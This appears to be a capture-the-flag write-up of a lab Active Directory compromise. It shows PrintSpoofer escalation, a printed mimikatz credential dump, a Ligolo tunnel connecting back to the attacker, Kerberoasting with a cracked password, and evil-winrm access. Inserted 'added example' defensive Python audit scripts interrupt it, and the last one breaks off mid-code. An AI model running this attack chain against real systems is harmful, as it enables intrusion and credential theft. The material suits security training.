SeIncreaseWorkingSetPrivilege Increase a process working set                    Disabled                      


[*] Session 7131c10e SOLID_DEVIANCE - 43.198.107.83:51886 (Web-SRV01) - windows/amd64 - Mon, 11 Nov 2024 02:10:14 UTC

By uploading PrintSpoofer and executing it through our existing implant, we got a session with NT AUTHORITY\SYSTEM privileges. Note that to run commands from the implant you have to prefix the command with execute, and if you want to see the command's output, add the -o switch after execute.

Going into the user tester's Desktop, the second flag was found.

Hack{[lacc2af79ea334020fe975b24998e093e0bf73d424836c0504a87d99c7b65l52]}

Internal Server – Jump!


Category : Red Team

Points : 100

Don't stay in one machine, try to jump out of the box!

Running ipconfig /all reveals the compromised machine's network configuration, which can be used to reach the internal network. As you can see, Web-SRV01 has the internal IP address 172.31.43.219 and points to a DNS server at 172.31.36.211. On a domain-joined machine, the configured DNS server is most likely the Domain Controller.

PS C:\windows\tasks> ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : Web-SRV01
   Primary Dns Suffix  . . . . . . . : corp.darklab.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : ap-east-1.ec2-utilities.amazonaws.com
                                       ap-east-1.compute.internal

Ethernet adapter Ethernet 3:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Amazon Elastic Network Adapter
   Physical Address. . . . . . . . . : 06-0B-2A-D8-F1-73
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 172.31.43.219(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.240.0
   Default Gateway . . . . . . . . . : 172.31.32.1
   DNS Servers . . . . . . . . . . . : 172.31.36.211
   NetBIOS over Tcpip. . . . . . . . : Enabled

mimikatz.exe was uploaded to check for cached credentials, which revealed nothing useful.

PS C:\windows\tasks> .\mimikatz.exe privilege::debug sekurlsa::logonpasswords
.\mimikatz.exe privilege::debug sekurlsa::logonpasswords

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 61997 (00000000:0000f22d)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/6/2024 3:23:31 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * NTLM     : 2721539d17b4772c0b4b43a5aecaa0b1
	 * SHA1     : 90d410b567bdd199d3ce107e440219ef43b80982
	 * DPAPI    : 90d410b567bdd199d3ce107e440219ef
	tspkg :	
	wdigest :	
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * Password : (null)
	kerberos :	
	 * Username : WEB-SRV01$
	 * Domain   : corp.darklab.local
	 * Password : d6 59 b8 c1 30 ac 21 32 be ad ce c5 db e2 0b 19 63 86 5e 18 84 a9 e9 79 74 59 ad 38 59 83 c5 2c 41 2f 28 b8 a7 e1 45 31 c2 0d 66 d7 5d fc 1f 82 d2 27 b0 53 d6 b9 bc f7 a8 9f c9 04 11 40 bc bb 7d d3 14 64 87 c8 7d 58 1e d7 a6 56 c0 d3 11 a0 61 e2 77 58 ea 6a f6 9f cb 66 bb 32 21 d0 19 22 7c c6 23 d6 b5 4c 41 a2 d5 44 82 db 1f 26 7a 1a 04 62 40 b0 58 d8 d1 a3 b7 d3 fa 82 01 21 c9 5d 6d 7a 06 1d 63 04 9c 95 0a a1 59 26 52 fa e3 50 a1 61 6a 1a 72 ee 09 0e 39 96 32 da 52 11 9b 1f ab a9 e3 d5 d1 f3 e8 70 dc 40 7f 47 bc dc 4a 29 a1 f4 ae c2 4e dc cc 6a c6 cd 67 95 10 d5 68 2a b3 d3 8a 93 98 c4 f0 20 e2 e7 56 13 95 0c 4c f2 82 b7 4b 15 7b 9e f5 f2 14 46 35 0d 29 88 f0 46 36 ad 0d 4b 1a fd 74 68 37 06 24 32 7a 95 26 e6 
	ssp :	
	credman :	

Authentication Id : 0 ; 61981 (00000000:0000f21d)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/6/2024 3:23:31 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * NTLM     : 2721539d17b4772c0b4b43a5aecaa0b1
	 * SHA1     : 90d410b567bdd199d3ce107e440219ef43b80982
	 * DPAPI    : 90d410b567bdd199d3ce107e440219ef
	tspkg :	
	wdigest :	
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * Password : (null)
	kerberos :	
	 * Username : WEB-SRV01$
	 * Domain   : corp.darklab.local
	 * Password : d6 59 b8 c1 30 ac 21 32 be ad ce c5 db e2 0b 19 63 86 5e 18 84 a9 e9 79 74 59 ad 38 59 83 c5 2c 41 2f 28 b8 a7 e1 45 31 c2 0d 66 d7 5d fc 1f 82 d2 27 b0 53 d6 b9 bc f7 a8 9f c9 04 11 40 bc bb 7d d3 14 64 87 c8 7d 58 1e d7 a6 56 c0 d3 11 a0 61 e2 77 58 ea 6a f6 9f cb 66 bb 32 21 d0 19 22 7c c6 23 d6 b5 4c 41 a2 d5 44 82 db 1f 26 7a 1a 04 62 40 b0 58 d8 d1 a3 b7 d3 fa 82 01 21 c9 5d 6d 7a 06 1d 63 04 9c 95 0a a1 59 26 52 fa e3 50 a1 61 6a 1a 72 ee 09 0e 39 96 32 da 52 11 9b 1f ab a9 e3 d5 d1 f3 e8 70 dc 40 7f 47 bc dc 4a 29 a1 f4 ae c2 4e dc cc 6a c6 cd 67 95 10 d5 68 2a b3 d3 8a 93 98 c4 f0 20 e2 e7 56 13 95 0c 4c f2 82 b7 4b 15 7b 9e f5 f2 14 46 35 0d 29 88 f0 46 36 ad 0d 4b 1a fd 74 68 37 06 24 32 7a 95 26 e6 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEB-SRV01$
Domain            : CORP
Logon Server      : (null)
Logon Time        : 11/6/2024 3:23:30 AM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * NTLM     : 2721539d17b4772c0b4b43a5aecaa0b1
	 * SHA1     : 90d410b567bdd199d3ce107e440219ef43b80982
	 * DPAPI    : 90d410b567bdd199d3ce107e440219ef
	tspkg :	
	wdigest :	
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * Password : (null)
	kerberos :	
	 * Username : web-srv01$
	 * Domain   : CORP.DARKLAB.LOCAL
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 30363 (00000000:0000769b)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 11/6/2024 3:23:29 AM
SID               : S-1-5-96-0-1
	msv :	
	 [00000003] Primary
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * NTLM     : 2721539d17b4772c0b4b43a5aecaa0b1
	 * SHA1     : 90d410b567bdd199d3ce107e440219ef43b80982
	 * DPAPI    : 90d410b567bdd199d3ce107e440219ef
	tspkg :	
	wdigest :	
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * Password : (null)
	kerberos :	
	 * Username : WEB-SRV01$
	 * Domain   : corp.darklab.local
	 * Password : d6 59 b8 c1 30 ac 21 32 be ad ce c5 db e2 0b 19 63 86 5e 18 84 a9 e9 79 74 59 ad 38 59 83 c5 2c 41 2f 28 b8 a7 e1 45 31 c2 0d 66 d7 5d fc 1f 82 d2 27 b0 53 d6 b9 bc f7 a8 9f c9 04 11 40 bc bb 7d d3 14 64 87 c8 7d 58 1e d7 a6 56 c0 d3 11 a0 61 e2 77 58 ea 6a f6 9f cb 66 bb 32 21 d0 19 22 7c c6 23 d6 b5 4c 41 a2 d5 44 82 db 1f 26 7a 1a 04 62 40 b0 58 d8 d1 a3 b7 d3 fa 82 01 21 c9 5d 6d 7a 06 1d 63 04 9c 95 0a a1 59 26 52 fa e3 50 a1 61 6a 1a 72 ee 09 0e 39 96 32 da 52 11 9b 1f ab a9 e3 d5 d1 f3 e8 70 dc 40 7f 47 bc dc 4a 29 a1 f4 ae c2 4e dc cc 6a c6 cd 67 95 10 d5 68 2a b3 d3 8a 93 98 c4 f0 20 e2 e7 56 13 95 0c 4c f2 82 b7 4b 15 7b 9e f5 f2 14 46 35 0d 29 88 f0 46 36 ad 0d 4b 1a fd 74 68 37 06 24 32 7a 95 26 e6 
	ssp :	
	credman :	

Authentication Id : 0 ; 30281 (00000000:00007649)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 11/6/2024 3:23:29 AM
SID               : S-1-5-96-0-0
	msv :	
	 [00000003] Primary
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * NTLM     : 2721539d17b4772c0b4b43a5aecaa0b1
	 * SHA1     : 90d410b567bdd199d3ce107e440219ef43b80982
	 * DPAPI    : 90d410b567bdd199d3ce107e440219ef
	tspkg :	
	wdigest :	
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * Password : (null)
	kerberos :	
	 * Username : WEB-SRV01$
	 * Domain   : corp.darklab.local
	 * Password : d6 59 b8 c1 30 ac 21 32 be ad ce c5 db e2 0b 19 63 86 5e 18 84 a9 e9 79 74 59 ad 38 59 83 c5 2c 41 2f 28 b8 a7 e1 45 31 c2 0d 66 d7 5d fc 1f 82 d2 27 b0 53 d6 b9 bc f7 a8 9f c9 04 11 40 bc bb 7d d3 14 64 87 c8 7d 58 1e d7 a6 56 c0 d3 11 a0 61 e2 77 58 ea 6a f6 9f cb 66 bb 32 21 d0 19 22 7c c6 23 d6 b5 4c 41 a2 d5 44 82 db 1f 26 7a 1a 04 62 40 b0 58 d8 d1 a3 b7 d3 fa 82 01 21 c9 5d 6d 7a 06 1d 63 04 9c 95 0a a1 59 26 52 fa e3 50 a1 61 6a 1a 72 ee 09 0e 39 96 32 da 52 11 9b 1f ab a9 e3 d5 d1 f3 e8 70 dc 40 7f 47 bc dc 4a 29 a1 f4 ae c2 4e dc cc 6a c6 cd 67 95 10 d5 68 2a b3 d3 8a 93 98 c4 f0 20 e2 e7 56 13 95 0c 4c f2 82 b7 4b 15 7b 9e f5 f2 14 46 35 0d 29 88 f0 46 36 ad 0d 4b 1a fd 74 68 37 06 24 32 7a 95 26 e6 
	ssp :	
	credman :	

Authentication Id : 0 ; 29038 (00000000:0000716e)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 11/6/2024 3:23:29 AM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * NTLM     : 2721539d17b4772c0b4b43a5aecaa0b1
	 * SHA1     : 90d410b567bdd199d3ce107e440219ef43b80982
	 * DPAPI    : 90d410b567bdd199d3ce107e440219ef
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 11/6/2024 3:23:32 AM
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 79842 (00000000:000137e2)
Session           : Service from 0
User Name         : web_root
Domain            : WEB-SRV01
Logon Server      : WEB-SRV01
Logon Time        : 11/6/2024 3:23:32 AM
SID               : S-1-5-21-496616251-2340469536-2080137254-1008
	msv :	
	 [00000003] Primary
	 * Username : web_root
	 * Domain   : WEB-SRV01
	 * NTLM     : d916b49871015c0be5809b842afb03b7
	 * SHA1     : 5d9c4c7f658e56a63aea995ae2e3eea025ea8191
	 * DPAPI    : 5d9c4c7f658e56a63aea995ae2e3eea0
	tspkg :	
	wdigest :	
	 * Username : web_root
	 * Domain   : WEB-SRV01
	 * Password : (null)
	kerberos :	
	 * Username : web_root
	 * Domain   : WEB-SRV01
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 11/6/2024 3:23:31 AM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WEB-SRV01$
Domain            : CORP
Logon Server      : (null)
Logon Time        : 11/6/2024 3:23:29 AM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WEB-SRV01$
	 * Domain   : CORP
	 * Password : (null)
	kerberos :	
	 * Username : web-srv01$
	 * Domain   : CORP.DARKLAB.LOCAL
	 * Password : (null)
	ssp :	
	credman :	

To pivot into the internal network, Ligolo was used. On the attacker's machine, create a new TUN interface for it:

sudo ip tuntap add user kali mode tun ligolo

Enable the new interface

sudo ip link set ligolo up

Start the pivoting server

ligolo -selfcert

On the compromised machine, upload the Ligolo agent and execute it to connect back to the attacker's machine.

ligolo.exe -connect <EC2_IP_ADDRESS>:11601 -ignore-cert

Once that is done, a connection will appear in Ligolo; select it with the session command and then run start to begin tunneling through Web-SRV01.

Before anything else, let's enumerate the users on the domain, if possible. This can be done with net users /domain; to look at a specific user, use net user <USERNAME> /domain.

alexwong


sliver (SOLID_DEVIANCE) > execute -o net user alexwong /domain

[*] Output:
The request will be processed at a domain controller for domain corp.darklab.local.

User name                    alexwong
Full Name                    Alex Wong
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/17/2024 6:10:10 AM
Password expires             Never
Password changeable          9/18/2024 6:10:10 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   10/21/2024 7:39:38 AM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Manager              *Domain Users         
The command completed successfully.

thomaschan


sliver (SOLID_DEVIANCE) > execute -o net user thomaschan /domain

[*] Output:
The request will be processed at a domain controller for domain corp.darklab.local.

User name                    thomaschan
Full Name                    Thomas Chan
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/24/2024 8:03:44 AM
Password expires             Never
Password changeable          9/25/2024 8:03:44 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   9/23/2024 1:46:39 PM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

stevenho


net user stevenho /domain
The request will be processed at a domain controller for domain corp.darklab.local.

User name                    stevenho
Full Name                    Steven Ho
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/19/2024 7:51:21 AM
Password expires             Never
Password changeable          9/20/2024 7:51:21 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   10/3/2024 4:27:55 PM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Manager              *Domain Users         
The command completed successfully.

webservice


net user webservice /domain
The request will be processed at a domain controller for domain corp.darklab.local.

User name                    webservice
Full Name                    WebService
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/24/2024 8:04:28 AM
Password expires             Never
Password changeable          9/25/2024 8:04:28 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   10/19/2024 6:53:38 AM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

tester


net user tester /domain
The request will be processed at a domain controller for domain corp.darklab.local.

User name                    tester
Full Name                    Tester
Comment                      PW:7S3Tzpx3l
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/19/2024 7:34:33 AM
Password expires             Never
Password changeable          9/20/2024 7:34:33 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   10/21/2024 7:32:51 AM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

Analysis


Notice that for the user tester, the account's password is stored in the Comment (description) field, which any domain user can read. With that we have our first set of credentials!

tester:7S3Tzpx3l
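The same finding can be turned into an audit check. The following is an added example, not part of the original writeup: it parses concatenated `net user <name> /domain` output (a constructed sample is embedded; the account names and values are made up) and flags any free-text field that looks like it carries a password. In `net user` output, Comment corresponds to the AD description attribute and User's comment to the comment attribute, both readable by any authenticated domain user.

```python
import re

# Constructed sample of `net user <name> /domain` output for three accounts.
# Only the fields relevant to this check are reproduced; all values are made up.
SAMPLE_NET_USER_OUTPUT = """\
User name                    svc_backup
Full Name                    Backup Service
Comment                      PW:Wint3r2024!
User's comment
Account active               Yes
The command completed successfully.

User name                    jdoe
Full Name                    Jane Doe
Comment                      Finance team
User's comment               temp password = Welcome1
Account active               Yes
The command completed successfully.

User name                    bsmith
Full Name                    Bob Smith
Comment                      Helpdesk
User's comment
Account active               Yes
The command completed successfully.
"""

# Free-text fields that `net user` exposes to every domain user
# (Comment = AD 'description', User's comment = AD 'comment').
FREE_TEXT_FIELDS = ("Comment", "User's comment")

# Whole-word tokens that commonly precede a stored secret; the separator is optional
# so that "PW:abc", "password = abc" and a bare "pwd abc" are all caught.
SECRET_HINT = re.compile(r"\b(pw|pwd|pass|passwd|password|secret|cred)\b\s*[:=]?", re.I)


def parse_net_user_blocks(text):
    """Split concatenated `net user` output into one {label: value} dict per account."""
    accounts, current = [], {}
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if line.startswith("The command completed"):
            if current:
                accounts.append(current)
            current = {}
            continue
        # `net user` separates label from value with a run of spaces; labels themselves
        # contain at most a single space ("Full Name", "User's comment").
        parts = re.split(r"\s{2,}", line, maxsplit=1)
        label = parts[0].strip()
        value = parts[1].strip() if len(parts) > 1 else ""
        current[label] = value
    if current:
        accounts.append(current)
    return accounts


def find_credentials_in_descriptions(text):
    """Return (user, field, value) for every free-text field that looks like it holds a secret."""
    findings = []
    for acct in parse_net_user_blocks(text):
        user = acct.get("User name", "<unknown>")
        for field in FREE_TEXT_FIELDS:
            value = acct.get(field, "")
            if value and SECRET_HINT.search(value):
                findings.append((user, field, value))
    return findings


if __name__ == "__main__":
    for user, field, value in find_credentials_in_descriptions(SAMPLE_NET_USER_OUTPUT):
        print(f"{user}: '{field}' looks like it contains a credential -> {value!r}")
```

In a real audit you would pull the description and comment attributes for every account over LDAP rather than shell out to `net user`, but the matching logic is the same. The only fix is to remove the secret from the attribute and rotate the password, since everyone in Authenticated Users has already been able to read it.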

Bloodhound


The next thing to do once you have credentials, which is literally a hack, is to run bloodhound-python to enumerate the domain and find other users, groups, policies and even machines. bloodhound-python was chosen over SharpHound because collection and ingestion of the BloodHound data can be done entirely from the attacker's machine. You can install it with the following command:

sudo apt install bloodhound bloodhound.py

As said before, the Domain Controller has the IP address 172.31.36.211, and the domain, as shown in the user enumeration, is corp.darklab.local. With that, bloodhound-python is run with the following parameters:

bloodhound-python -u tester@corp.darklab.local -p 7S3Tzpx3l -ns 172.31.36.211 -d corp.darklab.local -c All

Looking at the results, there are 4 machines including the Domain Controller; besides the DC, they are:

  • DEV-SRV01.CORP.DARKLAB.LOCAL

  • PROD-SRV01.CORP.DARKLAB.LOCAL

  • WEB-SRV01.CORP.DARKLAB.LOCAL

By using nslookup on the compromised machine, we are able to get the IP addresses of these machines.

DEV-SRV01.CORP.DARKLAB.LOCAL : 172.31.42.69

PROD-SRV01.CORP.DARKLAB.LOCAL : 172.31.34.30

Now that we have the IP addresses of all the machines, add a route to them through the new ligolo interface.

Now that we can tunnel into the network and have a set of credentials, let's start by attempting Kerberoasting with impacket-GetUserSPNs. The script authenticates as our user to request a Ticket-Granting Ticket (TGT) from the Kerberos server (the KDC). It then presents that TGT, together with the name of a service the user wants to access, to request a service ticket (TGS) for each account that has a Service Principal Name. The TGS is encrypted with the service account's password hash, so it can be cracked offline. As you can see, the following service returned a Kerberos hash which can be cracked with hashcat.

Cracking the hash with hashcat shows that the password is myspace1.

PS C:\DFIR Tools\hashcat> .\hashcat.exe -a 0 -m 13100 .\hash.txt .\rockyou.txt -r .\best64.rule --show
$krb5tgs$23$*webservice$CORP.DARKLAB.LOCAL$corp.darklab.local/webservice*$62a893e5cb5b83b018f9902ff60d90a4$[...]:myspace1
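To make the hash line above concrete, here is an added example (not from the writeup, nor from impacket or hashcat) that parses the hashcat `$krb5tgs$` format: it pulls out the encryption type, service account, realm and SPN, maps the etype to the hashcat mode (the 13100 used above is the RC4 etype 23 format; 19600 and 19700 are the AES etypes 17 and 18) and flags tickets still issued with RC4. The two sample lines are constructed with made-up hex, not real ticket material.

```python
import re

# hashcat mode for each Kerberos encryption type seen in a TGS-REP (Kerberoast) hash.
# 23 = RC4-HMAC, keyed directly by the NT hash and fast to crack offline;
# 17/18 = AES128/AES256, keyed by a PBKDF2-derived key and far slower per guess.
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
ETYPE_NAME = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

# Two layouts are in circulation (both accepted by hashcat):
#   etype 23    : $krb5tgs$23$*user$REALM$spn*$checksum$edata
#   etype 17/18 : $krb5tgs$18$user$REALM$*spn*$checksum$edata   (the *spn* part may be absent)
TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$"
    r"(?:\*(?P<u23>[^$]+)\$(?P<r23>[^$]+)\$(?P<s23>[^*]*)\*\$"
    r"|(?P<u>[^$*]+)\$(?P<r>[^$*]+)\$(?:\*(?P<s>[^*]*)\*\$)?)"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)

SAMPLE_LINES = [
    # Constructed: RC4 ticket for an SQL service account (16-byte checksum, edata shortened).
    "$krb5tgs$23$*svc_sql$CORP.EXAMPLE.LOCAL$MSSQLSvc/sql01.corp.example.local:1433*$"
    "0123456789abcdef0123456789abcdef$" + "ab" * 64,
    # Constructed: AES256 ticket for a web service account (12-byte checksum).
    "$krb5tgs$18$svc_web$CORP.EXAMPLE.LOCAL$*HTTP/web01.corp.example.local*$"
    "0123456789abcdef01234567$" + "cd" * 64,
]


def parse_krb5tgs(line):
    """Parse one hashcat-format Kerberoast line into its fields, or raise ValueError."""
    m = TGS_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$ hash line")
    g = m.groupdict()
    etype = int(g["etype"])
    return {
        "etype": etype,
        "etype_name": ETYPE_NAME.get(etype, "unknown"),
        "user": g["u23"] or g["u"],
        "realm": g["r23"] or g["r"],
        "spn": g["s23"] if g["s23"] is not None else g["s"],
        "checksum_bytes": len(g["checksum"]) // 2,  # 16 for RC4, 12 for AES
        "edata_bytes": len(g["edata"]) // 2,
        "hashcat_mode": HASHCAT_MODE.get(etype),
        "rc4": etype == 23,
    }


def triage_kerberoast_output(lines):
    """Summarise a hash file: (user, realm, etype name, still-on-RC4) per ticket line."""
    report = []
    for line in lines:
        if not line.startswith("$krb5tgs$"):
            continue  # skip impacket's human-readable header rows
        info = parse_krb5tgs(line)
        report.append((info["user"], info["realm"], info["etype_name"], info["rc4"]))
    return report


if __name__ == "__main__":
    for user, realm, etype, rc4 in triage_kerberoast_output(SAMPLE_LINES):
        flag = "RC4 ticket: weak, fix the account" if rc4 else "AES ticket"
        print(f"{user}@{realm}: {etype} -> {flag}")
```

From the defender's side, the fact that a ticket came back as etype 23 is the finding: the service account either still permits RC4 in msDS-SupportedEncryptionTypes or has no AES keys, and its password is a human-chosen one. Moving the account to AES-only, using a gMSA or a long random password, and alerting on Event ID 4769 with ticket encryption type 0x17 requested by non-DC hosts closes the gap.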

nxc winrm 172.31.42.69 -u webservice -p myspace1

As shown below, the set of credentials was able to access DEV-SRV01.

The second set of credentials was then used to log in to DEV-SRV01 with evil-winrm, using the following command:

evil-winrm -i 172.31.42.69 -u webservice -p myspace1

Running whoami /all shows that webservice is a local administrator on DEV-SRV01.

*Evil-WinRM* PS C:\Users> whoami /all

USER INFORMATION
----------------

User Name       SID
=============== ==============================================
corp\webservice S-1-5-21-3483600032-2896525879-1347015629-1115


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ===============================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators               Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                 Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
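As an added example (not part of the writeup), the following parses `whoami /all` output into its sections by using the `=` underline row to derive column boundaries, which matters because a column such as Type is separated from its neighbour by a single space when the value fills it exactly. It then flags membership of the local Administrators group by SID and any held high-impact privilege, whether whoami shows it Enabled or Disabled. The sample output is constructed in whoami's layout with made-up SIDs; `_table` exists only to build that sample.

```python
import re


def _table(headers, rows):
    """Render rows the way whoami does: space-separated fixed-width columns under a '=' row."""
    widths = [max(len(h), *(len(r[i]) for r in rows)) for i, h in enumerate(headers)]

    def fmt(cells):
        return " ".join(c.ljust(w) for c, w in zip(cells, widths)).rstrip()

    return "\n".join([fmt(headers), " ".join("=" * w for w in widths)] + [fmt(r) for r in rows])


# Constructed `whoami /all` excerpt for a service account; SIDs and names are made up.
SAMPLE_WHOAMI_ALL = "\n".join([
    "USER INFORMATION", "----------------", "",
    _table(["User Name", "SID"],
           [["corp\\svc_app", "S-1-5-21-1111111111-2222222222-3333333333-1105"]]),
    "", "",
    "GROUP INFORMATION", "-----------------", "",
    _table(["Group Name", "Type", "SID", "Attributes"], [
        ["Everyone", "Well-known group", "S-1-1-0", "Mandatory group, Enabled by default, Enabled group"],
        ["BUILTIN\\Administrators", "Alias", "S-1-5-32-544",
         "Mandatory group, Enabled by default, Enabled group, Group owner"],
        ["BUILTIN\\Users", "Alias", "S-1-5-32-545", "Mandatory group, Enabled by default, Enabled group"],
        ["Mandatory Label\\High Mandatory Level", "Label", "S-1-16-12288", ""],
    ]),
    "", "",
    "PRIVILEGES INFORMATION", "----------------------", "",
    _table(["Privilege Name", "Description", "State"], [
        ["SeChangeNotifyPrivilege", "Bypass traverse checking", "Enabled"],
        ["SeImpersonatePrivilege", "Impersonate a client after authentication", "Enabled"],
        ["SeDebugPrivilege", "Debug programs", "Disabled"],
        ["SeIncreaseWorkingSetPrivilege", "Increase a process working set", "Disabled"],
    ]),
    "",
])

LOCAL_ADMIN_SID = "S-1-5-32-544"

# Privileges whose presence in a service account's token is an audit finding on its own.
# 'Disabled' in whoami only means "not currently active in this token": the process that
# holds it can turn it on with AdjustTokenPrivileges, so held-but-disabled still counts.
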